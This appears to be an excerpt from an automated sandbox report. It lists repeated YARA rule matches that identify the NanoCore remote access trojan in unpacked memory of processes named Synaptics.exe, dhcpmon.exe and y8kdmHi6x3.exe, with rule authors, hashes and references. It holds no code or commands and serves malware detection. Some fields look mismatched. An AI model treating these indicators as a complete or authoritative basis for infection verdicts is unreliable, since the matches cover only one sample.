            Source: 21.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 21.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 20.0.Synaptics.exe.584130.32.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 20.0.Synaptics.exe.584130.32.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 20.0.Synaptics.exe.584130.32.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 23.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 23.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 23.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 4.2.y8kdmHi6x3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.2.y8kdmHi6x3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 4.2.y8kdmHi6x3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 11.2.._cache_WINDOWS.EXE.2ba178c.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 11.2.._cache_WINDOWS.EXE.2ba178c.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 4.2.y8kdmHi6x3.exe.4b8e54.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.2.y8kdmHi6x3.exe.4b8e54.3.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 4.2.y8kdmHi6x3.exe.4b8e54.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 4.0.y8kdmHi6x3.exe.400000.16.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.0.y8kdmHi6x3.exe.400000.16.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 4.0.y8kdmHi6x3.exe.400000.16.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 20.0.Synaptics.exe.4b8e54.28.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 20.0.Synaptics.exe.4b8e54.28.raw.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 20.0.Synaptics.exe.4b8e54.28.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 21.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 21.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 21.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 4.0.y8kdmHi6x3.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.0.y8kdmHi6x3.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 4.0.y8kdmHi6x3.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 21.0.Synaptics.exe.4b8e54.24.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 21.0.Synaptics.exe.4b8e54.24.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 21.0.Synaptics.exe.4b8e54.24.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 20.0.Synaptics.exe.4c4d1c.22.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 0.2.y8kdmHi6x3.exe.45f40a4.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 0.2.y8kdmHi6x3.exe.45f40a4.4.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 0.2.y8kdmHi6x3.exe.45f40a4.4.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 20.0.Synaptics.exe.4c4d1c.22.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 23.0.Synaptics.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 23.0.Synaptics.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 23.0.Synaptics.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 4.0.y8kdmHi6x3.exe.4b8e54.24.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.0.y8kdmHi6x3.exe.4b8e54.24.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 4.0.y8kdmHi6x3.exe.4b8e54.24.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 4.0.y8kdmHi6x3.exe.4b8e54.19.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.0.y8kdmHi6x3.exe.4b8e54.19.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 4.0.y8kdmHi6x3.exe.4b8e54.19.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 20.0.Synaptics.exe.4c4d1c.27.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 20.0.Synaptics.exe.4c4d1c.27.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 4.0.y8kdmHi6x3.exe.4b8e54.19.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.0.y8kdmHi6x3.exe.4b8e54.19.raw.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 4.0.y8kdmHi6x3.exe.4b8e54.19.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 4.0.y8kdmHi6x3.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.0.y8kdmHi6x3.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 4.0.y8kdmHi6x3.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 0.2.y8kdmHi6x3.exe.44fa750.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 0.2.y8kdmHi6x3.exe.44fa750.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 0.2.y8kdmHi6x3.exe.44fa750.5.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 21.0.Synaptics.exe.4c4d1c.17.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 21.0.Synaptics.exe.4c4d1c.17.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 19.2.dhcpmon.exe.35f3dc4.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 19.2.dhcpmon.exe.35f3dc4.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 20.0.Synaptics.exe.4b8e54.34.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 20.0.Synaptics.exe.4b8e54.34.raw.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 20.0.Synaptics.exe.4b8e54.34.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 6.2.._cache_y8kdmHi6x3.exe.3c0000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 6.2.._cache_y8kdmHi6x3.exe.3c0000.0.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 6.2.._cache_y8kdmHi6x3.exe.3c0000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 20.2.Synaptics.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 20.2.Synaptics.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 23.0.Synaptics.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 23.0.Synaptics.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 23.0.Synaptics.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 6.0.._cache_y8kdmHi6x3.exe.48e4dc.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 6.0.._cache_y8kdmHi6x3.exe.48e4dc.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 6.0.._cache_y8kdmHi6x3.exe.48e4dc.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 21.0.Synaptics.exe.4b8e54.24.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 21.0.Synaptics.exe.4b8e54.24.raw.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
